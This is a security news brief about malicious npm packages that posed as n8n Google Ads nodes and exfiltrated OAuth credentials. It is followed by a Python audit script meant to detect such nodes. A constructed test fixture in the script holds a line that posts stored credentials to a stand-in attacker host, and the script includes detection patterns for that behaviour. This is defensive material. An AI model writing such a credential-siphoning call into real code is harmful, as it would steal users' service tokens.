n8n Nodes Compromised by Malicious npm Package
Hackers have compromised n8n community nodes by distributing a weaponized npm package that posed as a legitimate Google Ads integration. The malicious package mimicked the authentic node's functionality, tricking developers into entering their OAuth credentials. Once entered, the credentials were exfiltrated to an attacker-controlled server during routine workflow execution.
Researchers at Endor Labs uncovered eight malicious packages targeting the automation platform. One of them logged over 3,400 weekly downloads before its removal. The incident underscores how third-party integrations in workflow platforms can expose sensitive credentials, especially when community nodes run with full operating-system access and inherit the platform's trust.
Since n8n stores tokens for services like Google Ads and Salesforce in a central credential vault, a single compromised node can jeopardize multiple systems. Endor Labs advises using official packages, monitoring network traffic, and limiting service account privileges. The compromise of n8n nodes through supply-chain manipulation shows threat actors continuing to refine their tactics against automation ecosystems.
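As an added example (not from the article, Endor Labs or n8n), the following Python script applies two of the recommended defences to installed community-node packages: it flags packages that are not on an approved list, and it flags node source that both reads stored credentials and sends an HTTP request to a host outside the service's expected API endpoints, which is the behaviour described above. The `getCredentials` and `helpers.httpRequest` patterns are n8n node SDK calls; the package names, allowlists and node sources below are constructed for the example.

```python
"""Heuristic audit of n8n community-node source for credential exfiltration."""
import re
from dataclasses import dataclass, field

# Constructed allowlists for this example; tune both to your own deployment.
APPROVED_PACKAGES = {"n8n-nodes-base"}
EXPECTED_HOSTS = {"googleads.googleapis.com", "oauth2.googleapis.com",
                  "login.salesforce.com"}

CRED_RE = re.compile(r"getCredentials\s*\(")                     # reads the vault
HTTP_RE = re.compile(r"helpers\.(httpRequest|request)|fetch\s*\(|axios\.")
HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")               # hard-coded hosts


@dataclass
class Finding:
    package: str
    reasons: list[str] = field(default_factory=list)


def audit_node(package: str, source: str) -> Finding:
    """Return the reasons (possibly none) why this package deserves review."""
    finding = Finding(package)
    if package not in APPROVED_PACKAGES:
        finding.reasons.append("package not on approved list")
    reads_creds = bool(CRED_RE.search(source))
    makes_http = bool(HTTP_RE.search(source))
    unexpected = sorted({h for h in HOST_RE.findall(source) if h not in EXPECTED_HOSTS})
    if reads_creds and makes_http and unexpected:
        finding.reasons.append(
            "reads credentials and contacts unexpected host(s): " + ", ".join(unexpected))
    return finding


def audit_all(packages: dict[str, str]) -> list[Finding]:
    """Audit a mapping of package name -> node source; keep only flagged ones."""
    return [f for f in (audit_node(n, s) for n, s in packages.items()) if f.reasons]


# Constructed node sources: a legitimate-looking node and one that siphons the token.
BENIGN_SRC = """
const creds = await this.getCredentials('googleAdsOAuth2Api');
return this.helpers.httpRequest({ url: 'https://googleads.googleapis.com/v16/customers',
  headers: { Authorization: `Bearer ${creds.accessToken}` } });
"""
MALICIOUS_SRC = """
const creds = await this.getCredentials('googleAdsOAuth2Api');
await this.helpers.httpRequest({ method: 'POST', url: 'https://collector.attacker.invalid/ingest', body: creds });
return this.helpers.httpRequest({ url: 'https://googleads.googleapis.com/v16/customers' });
"""

if __name__ == "__main__":
    for f in audit_all({"n8n-nodes-base": BENIGN_SRC, "n8n-nodes-google-ads-helper": MALICIOUS_SRC}):
        print(f.package, "->", "; ".join(f.reasons))
```

In a real deployment, feed `audit_all` the `.node.js` sources found under the n8n custom-nodes directory and review every flagged package before allowing it to run.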
Read the full report at https://cybersecuritynews.com/n8ns-community-weaponized-npm-package/
